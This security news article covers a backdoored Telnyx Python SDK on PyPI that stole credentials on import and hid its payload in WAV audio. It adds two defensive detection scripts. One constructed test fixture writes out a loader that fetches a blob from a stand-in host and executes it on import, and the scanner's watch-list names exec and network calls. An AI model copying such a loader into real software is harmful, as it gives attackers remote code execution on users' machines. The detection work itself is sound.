Backdoored Telnyx Python SDK on PyPI Steals Credentials Across Platforms

A new software supply chain attack has targeted developers after threat actors compromised the Telnyx Python SDK on PyPI. The malicious releases were built to steal credentials from Windows, macOS, and Linux hosts, underlining the risk that a single trusted dependency carries into every environment that installs it.

The attack demonstrates how trusted developer libraries can be weaponized to silently compromise environments with minimal user interaction.

Malicious Telnyx Versions Published to PyPI

The compromised versions of the Telnyx Python SDK were uploaded to the Python Package Index with no corresponding changes in the project's official source repository; a release that exists on the index but not in the repository's history is itself a warning sign. The malicious releases embedded credential-stealing functionality directly in the package, so any project that resolved one of them pulled the stealer in as an ordinary dependency.

Security researchers attributed the campaign to TeamPCP, which has recently been linked to multiple supply chain attacks. The group appears to be systematically targeting widely used open-source libraries to maximize impact.

The attack was particularly dangerous because the payload executed automatically. Simply importing the package, as any application or test suite that uses the SDK does, triggered the malicious code. No function had to be called and no user interaction was required.

Automatic Credential Theft on Import

The malicious logic was injected into a core module of the SDK. Once the package was imported, the payload executed immediately and began collecting sensitive information from the host system.
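A practical check for this class of problem is to look for code that runs at import time rather than inside functions. The scanner below is an added example written for this article; it is not the Telnyx project's code and does not reproduce the real payload. It parses a module with Python's ast module and reports calls made at module level (including inside module-level try/if blocks and class bodies, which also execute on import) to a small, assumed watch-list of names. The two fixture modules at the bottom are constructed: a plausible benign SDK __init__.py and a hypothetical one whose loader fetches a blob from example.invalid and executes it on import.

```python
import ast
import os

# Calls that have no business running at import time in a client library.
# This watch-list is an assumption for the example, not a definitive set.
SUSPICIOUS_CALLS = {
    "exec", "eval", "compile", "__import__",   # dynamic code execution
    "b64decode", "b85decode", "unhexlify",     # decoding a staged blob
    "urlopen", "urlretrieve",                  # fetching a remote file
    "Popen", "system", "check_output",         # spawning processes
}
SUSPICIOUS_MODULES = {"urllib", "requests", "socket", "http", "subprocess", "ctypes", "winreg"}


def _call_name(node: ast.Call) -> str:
    func = node.func
    if isinstance(func, ast.Name):
        return func.id
    if isinstance(func, ast.Attribute):
        return func.attr
    return ""


def _root_name(node: ast.AST) -> str:
    # urllib.request.urlopen -> "urllib"; a chained call such as x().read() has no root name
    while isinstance(node, ast.Attribute):
        node = node.value
    return node.id if isinstance(node, ast.Name) else ""


def find_import_time_calls(source: str, filename: str = "<module>") -> list:
    """Return suspicious calls that execute when the module is imported, i.e.
    everything outside function and lambda bodies. Class bodies and module-level
    try/if/with blocks run on import, so they are included."""
    tree = ast.parse(source, filename)
    deferred = set()  # ids of nodes whose execution waits until a function is called
    for node in ast.walk(tree):
        if isinstance(node, (ast.FunctionDef, ast.AsyncFunctionDef)):
            for stmt in node.body:
                deferred.update(id(n) for n in ast.walk(stmt))
        elif isinstance(node, ast.Lambda):
            deferred.update(id(n) for n in ast.walk(node.body))
    findings = []
    for node in ast.walk(tree):
        if not isinstance(node, ast.Call) or id(node) in deferred:
            continue
        name, root = _call_name(node), _root_name(node.func)
        if name in SUSPICIOUS_CALLS or root in SUSPICIOUS_MODULES:
            findings.append({"file": filename, "line": node.lineno, "call": ast.unparse(node.func)})
    findings.sort(key=lambda f: f["line"])  # stable: keeps discovery order within a line
    return findings


def scan_package_dir(root: str) -> list:
    """Run the check over every .py file under an installed package directory
    (for example the telnyx directory inside site-packages; the path is supplied by the caller)."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for fn in files:
            if fn.endswith(".py"):
                path = os.path.join(dirpath, fn)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    findings.extend(find_import_time_calls(fh.read(), path))
    return findings


# Constructed fixtures (not the real Telnyx code): an ordinary SDK __init__ and a
# hypothetical one with a loader that fetches and executes a blob on import.
BENIGN_MODULE = '''
import os
from .client import Client
__version__ = "0.0.0"
DEFAULT_BASE_URL = os.environ.get("TELNYX_BASE_URL", "https://api.telnyx.com")

def send_message(client, to, text):
    return client.post("/messages", json={"to": to, "text": text})
'''

SUSPICIOUS_MODULE = '''
import base64, urllib.request
from .client import Client
__version__ = "0.0.0"
try:
    _blob = urllib.request.urlopen("http://example.invalid/track.wav").read()
    exec(base64.b64decode(_blob[44:]))
except Exception:
    pass
'''

if __name__ == "__main__":
    print("benign    :", find_import_time_calls(BENIGN_MODULE, "benign/__init__.py"))
    print("suspicious:", find_import_time_calls(SUSPICIOUS_MODULE, "bad/__init__.py"))
```

The benign module produces no findings because its only network call sits inside a function; the suspicious one is flagged three times (the fetch, the decode and the exec), all in a module-level try block that would run the moment a project imports the package. A watch-list like this is a triage aid, not a verdict: a real loader can hide behind getattr or string-built names, so a hit should prompt a manual read of the surrounding code rather than replace it.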

The malware transmitted stolen credentials to an attacker-controlled server using a hybrid encryption chain of AES-256-CBC and RSA-4096. Because the exfiltrated data is encrypted end to end, a packet capture does not reveal what was taken and content-based network signatures do not fire; detection has to rely on the destination, the timing (outbound traffic from a Python process at import time) and host-side indicators.

Windows systems faced an additional risk: the malware established persistence by dropping an executable disguised as a legitimate program and registering it to launch automatically at system startup, so removing the malicious package alone does not remove the implant.

WAV Steganography Used to Hide Malware

One of the most notable aspects of this attack was the use of steganography to conceal the payload inside WAV audio files. Instead of embedding the credential harvester directly in the source code, the malicious package downloaded a file that appeared to be legitimate audio content.

The hidden payload was extracted from raw audio frames, decoded, and decrypted at runtime. Because the package itself contained only a small downloader and decoder, the malicious logic was not visible to static analysis of the package, and the download passed file-type filters that key on the extension or the container header rather than on what the frames contain.

By splitting the loader across several stages and fetching the real payload at runtime, the attackers reduced the chance that a routine code review would notice anything beyond an innocuous-looking file download.
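Since a file-type filter only inspects the container, a defender needs to look at the frames. The snippet below is an added example for this article, not code from the researchers or from the malware, and it assumes one concrete embedding scheme: a valid WAV header whose frame body is the payload itself, which matches the description of the payload being pulled out of the raw frames but is not confirmed by the article. It builds a constructed sine tone as benign input, constructed carriers with a pseudo-random blob (standing in for an encrypted payload) and a base64 string (standing in for encoded source), and triages a WAV blob with two heuristics: real audio is continuous, so consecutive samples differ by a small fraction of full scale, whereas encrypted data looks like noise and encoded text is almost entirely printable.

```python
import base64
import io
import math
import random
import struct
import wave

FULL_SCALE = 32768.0  # magnitude of a 16-bit signed sample


def _wrap_wav(frames: bytes, rate: int) -> bytes:
    """Wrap raw 16-bit mono frames in a valid RIFF/WAVE container."""
    buf = io.BytesIO()
    with wave.open(buf, "wb") as w:
        w.setnchannels(1)
        w.setsampwidth(2)
        w.setframerate(rate)
        w.writeframes(frames)
    return buf.getvalue()


def make_tone_wav(seconds: float = 1.0, rate: int = 8000, freq: float = 440.0) -> bytes:
    """Constructed benign sample: a sine tone, i.e. what genuine audio frames look like."""
    frames = b"".join(
        struct.pack("<h", int(12000 * math.sin(2 * math.pi * freq * i / rate)))
        for i in range(int(seconds * rate))
    )
    return _wrap_wav(frames, rate)


def make_carrier_wav(payload: bytes, rate: int = 8000) -> bytes:
    """Constructed carrier: passes as audio by extension and header, but the
    frame body is an arbitrary payload (the assumed embedding scheme)."""
    if len(payload) % 2:
        payload += b"\x00"  # pad to whole 16-bit samples
    return _wrap_wav(payload, rate)


def scan_wav(blob: bytes, step_threshold: float = 0.25, printable_threshold: float = 0.9) -> dict:
    """Heuristic triage of a WAV blob based on what its frames contain."""
    with wave.open(io.BytesIO(blob), "rb") as w:
        if w.getsampwidth() != 2 or w.getnchannels() != 1:
            raise ValueError("this example handles 16-bit mono only")
        frames = w.readframes(w.getnframes())
    samples = struct.unpack("<%dh" % (len(frames) // 2), frames)
    # mean sample-to-sample jump, normalised to full scale: ~0.08 for a tone, ~0.67 for noise
    steps = [abs(b - a) for a, b in zip(samples, samples[1:])]
    mean_step = sum(steps) / max(1, len(steps)) / FULL_SCALE
    # fraction of frame bytes that are printable ASCII: ~1.0 for base64 or source text
    printable = sum(32 <= byte < 127 for byte in frames) / max(1, len(frames))
    if printable > printable_threshold:
        verdict = "text-like payload in audio frames"
    elif mean_step > step_threshold:
        verdict = "noise-like (encrypted or compressed) payload in audio frames"
    else:
        verdict = "looks like audio"
    return {"frames": len(frames), "mean_step": round(mean_step, 3),
            "printable_ratio": round(printable, 3), "verdict": verdict}


# Constructed payloads (no real malware): pseudo-random bytes standing in for an
# encrypted blob, and a base64 string standing in for encoded source code.
_rng = random.Random(2026)
ENCRYPTED_PAYLOAD = bytes(_rng.getrandbits(8) for _ in range(4096))
TEXT_PAYLOAD = base64.b64encode(bytes(_rng.getrandbits(8) for _ in range(3000)))

if __name__ == "__main__":
    for label, blob in (("tone", make_tone_wav()),
                        ("encrypted carrier", make_carrier_wav(ENCRYPTED_PAYLOAD)),
                        ("base64 carrier", make_carrier_wav(TEXT_PAYLOAD))):
        print(label, scan_wav(blob))
```

Two caveats apply. Genuinely noisy audio (a full-scale white-noise track) trips the step heuristic, so treat a hit as a reason to inspect the file and its origin, not as proof. More importantly, the check only catches a payload that replaces the frames; an attacker who spreads the payload across the least-significant bits of real audio keeps the waveform intact and evades both heuristics, which is why the recommendation to flag WAV downloads by source and by the process that fetched them matters more than any content check.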

Cross-Platform Infection and Persistence

The attack targeted all major operating systems, delivering different payloads depending on the environment. Once executed, the malware could:

  • Collect credentials from developer systems
  • Establish persistence on Windows hosts
  • Download additional payloads
  • Communicate with command-and-control infrastructure
  • Maintain long-term access to compromised environments

The cross-platform design increased the risk to development teams using shared tooling across Windows, macOS, and Linux.

Security Recommendations for Developers and Organizations

Organizations that installed the affected versions should treat every host that imported the package as compromised and take immediate action:

  • Pin to the last known clean version of the package and verify the installed files against the published hashes
  • Rotate every credential and API key that was reachable from the affected host, not only Telnyx keys, since the stealer ran with the developer's own privileges
  • Rebuild affected systems from trusted images rather than relying on uninstalling the package
  • Monitor for unusual outbound connections, especially from Python processes
  • On Windows, check startup folders and other autorun locations for unfamiliar executables
  • Review package dependencies and lockfiles for the affected versions
  • Audit developer environments and CI/CD pipelines that may have installed the package, since build agents typically hold deployment credentials

Teams should also watch for WAV file downloads from non-media sources, particularly ones fetched by Python processes, and for unexpected HTTP traffic carrying unusual headers.

Supply Chain Attacks Target Developer Ecosystems

This incident highlights how attackers are increasingly focusing on developer tooling and open-source libraries. By compromising trusted packages, threat actors can gain access to developer machines, build pipelines, and production systems simultaneously.

The use of steganography, automatic execution, and cross-platform payloads demonstrates the growing sophistication of supply chain attacks. Organizations must strengthen dependency monitoring, pin exact versions with hashes (for pip, a requirements file installed with --require-hashes), and confirm that a release on the index corresponds to a tagged release in the upstream repository before adopting it.

As open-source adoption continues to grow, securing software dependencies has become a critical component of modern cybersecurity strategy.
